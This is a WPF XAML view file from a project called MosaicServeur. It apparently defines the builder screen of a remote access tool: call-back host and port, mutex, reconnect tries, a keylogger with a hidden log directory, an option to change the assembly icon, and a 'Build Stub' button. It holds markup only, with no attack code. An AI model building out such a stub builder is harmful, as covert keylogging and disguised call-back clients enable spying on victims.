MosaicServeur/Views/FrmMain/Builder.xaml

<UserControl x:Class="MosaicServeur.Builder"
             xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
             xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
             xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" 
             xmlns:d="http://schemas.microsoft.com/expression/blend/2008" 
             xmlns:local="clr-namespace:MosaicServeur"
             xmlns:materialDesign="http://materialdesigninxaml.net/winfx/xaml/themes"
             mc:Ignorable="d" 
             Height="auto" Width="auto" Loaded="Load">
    <Grid Background="White">
        
        <Grid.ColumnDefinitions>
            <ColumnDefinition Width="*"/>
        </Grid.ColumnDefinitions>

        <Grid.RowDefinitions>
            <RowDefinition Height="40"/>
            <RowDefinition Height="*"/>
            <RowDefinition Height="50"/>
        </Grid.RowDefinitions>

        <Grid Background="White" Panel.ZIndex="99" Grid.Row="0">
            <StackPanel Orientation="Horizontal" VerticalAlignment="Top" Margin="0 -2">
                <Button Uid="0" Width="150" Content="Connexion Settings" VerticalAlignment="Center" Height="40" Background="{x:Null}" BorderBrush="{x:Null}" Foreground="Black" Click="btnTabControl"/>
                <Button Uid="1" Width="150" Content="Basic Settings" VerticalAlignment="Center" Height="40" Background="{x:Null}" BorderBrush="{x:Null}" Foreground="Black" Click="btnTabControl"/>
            </StackPanel>
            <Grid x:Name="GridCursor" Width="150" Height="4" Background="#4a9ff5" Margin="0 20 0 0" HorizontalAlignment="Left"/>
        </Grid>
        
        <Border Margin="2 0 2 0" BorderBrush="LightGray" Grid.Row="1" BorderThickness="1">
            <Grid Grid.Row="1" x:Name="BuilderMenu">
                <TabControl BorderBrush="Transparent"  Name="tcSample">
                    <TabItem Style="{StaticResource lineTabItem}">

                        <StackPanel Orientation="Vertical">
                            <Label FontWeight="Medium" FontSize="25" Content="Connexion"></Label>

                            <TextBlock Margin="0 15 0 0" Padding="0" VerticalAlignment="top" Text="Ip Address / Hostname :"/>
                            <TextBox x:Name="txtHost" Style="{x:Null}" HorizontalAlignment="Left" Text="127.0.0.1" Width="200" />

                            <TextBlock  Margin="0 2 0 0" Padding="0" VerticalAlignment="top" Text="Port :"/>
                            <StackPanel Margin="0 -5" Orientation="Horizontal">
                                <TextBox Style="{x:Null}" x:Name="txtPort" x:FieldModifier="private" Margin="0,5,0,5" Width="70" Text="4444" FontSize="11" />
                                <Button Style="{x:Null}" x:Name="cmdDown" x:FieldModifier="private" Margin="0,5,0,5" FontSize="11"  Content="-" Width="15"  />
                                <Button Style="{x:Null}" x:Name="cmdUp" x:FieldModifier="private" Margin="0,5,0,5" FontSize="11" Content="+" Width="15"  />
                            </StackPanel>
                            <TextBlock Margin="0 2 0 0" Padding="0" VerticalAlignment="top" Text="Client Tag :"/>
                            <TextBox x:Name="txtClientTag" Text="" Style="{x:Null}" Margin="0 0 0 0"  HorizontalAlignment="Left"  Width="200" />

                            <TextBlock  Margin="0 2 0 0" Padding="0" VerticalAlignment="top" Text="Reconnect tries :"/>
                            <StackPanel Margin="0 -5" Orientation="Horizontal">
                                <TextBox Style="{x:Null}" x:Name="txtRecoTries" x:FieldModifier="private" Margin="0,5,0,5" Width="70" Text="3000" FontSize="11" />
                                <Button Style="{x:Null}" Margin="0,5,0,5" FontSize="11"  Content="-" Width="15"  />
                                <Button Style="{x:Null}" Margin="0,5,0,5" FontSize="11" Content="+" Width="15"  />
                            </StackPanel>
                            
                            <Label Margin="0 15" FontWeight="Medium" FontSize="25" Content="Mutex"></Label>


                            <StackPanel Orientation="Vertical">
                                <TextBlock Text="Mutex :"/>
                                <StackPanel VerticalAlignment="Top" Orientation="Horizontal">
                                    <TextBox x:Name="txtMutex" Style="{x:Null}" Text="" Width="300" />
                                    <Button Style="{x:Null}" Content="Random Mutex" Width="100" Click="btnMutex"/>
                                </StackPanel>
                            </StackPanel>
                        </StackPanel>
                    </TabItem>
                    
                    <TabItem Style="{StaticResource lineTabItem}">

                        <StackPanel Orientation="Vertical">
                            <Label FontWeight="Medium" FontSize="25" Content="Keylogger"></Label>

                            <CheckBox Margin="0 15 0 0" Style="{StaticResource MaterialDesignAccentCheckBox}" Background="#4a9ff5" Foreground="black" FontSize="11">
                                Enable keyboard logging.
                            </CheckBox>

                            <StackPanel Orientation="Vertical">
                                <TextBlock Margin="0 15 0 0" Padding="0" FontSize="11" VerticalAlignment="top"
                           Text="Log directory name:"/>
                                <TextBox Style="{x:Null}" HorizontalAlignment="Left"  Width="200" />
                            </StackPanel>

                            <CheckBox Margin="0 15 0 0" Style="{StaticResource MaterialDesignAccentCheckBox}" Background="#4a9ff5" Foreground="black" FontSize="11">
                                Set directory to hidden.
                            </CheckBox>

                            <Label Margin="0 15" FontWeight="Medium" FontSize="25" Content="Set Icon"></Label>


                            <StackPanel Orientation="Vertical">
                                <CheckBox x:Name="chkIcon" Style="{StaticResource MaterialDesignAccentCheckBox}" Background="#4a9ff5" Foreground="black" FontSize="11" >
                                    Change Assembly Icon.
                                </CheckBox>
                                <StackPanel Margin="0 0 0 0" VerticalAlignment="Top" Orientation="Horizontal">
                                    <TextBox Style="{x:Null}" Text="" Width="300" IsEnabled="False" />
                                    <Button Margin="0 0"  Style="{x:Null}" Content="Browse" Width="100"/>
                                </StackPanel>
                            </StackPanel>
                        </StackPanel>
                        
                    </TabItem>
                </TabControl>
            </Grid>
        </Border>
        
        <Grid Margin="10 0" Grid.Row="2">
            <Button Style="{StaticResource btnBlue}" Margin="10 0" VerticalAlignment="Center" HorizontalAlignment="Right" Content="Build Stub" Width="150" Click="btnBuild"/>            
        </Grid>
    </Grid>
</UserControl>
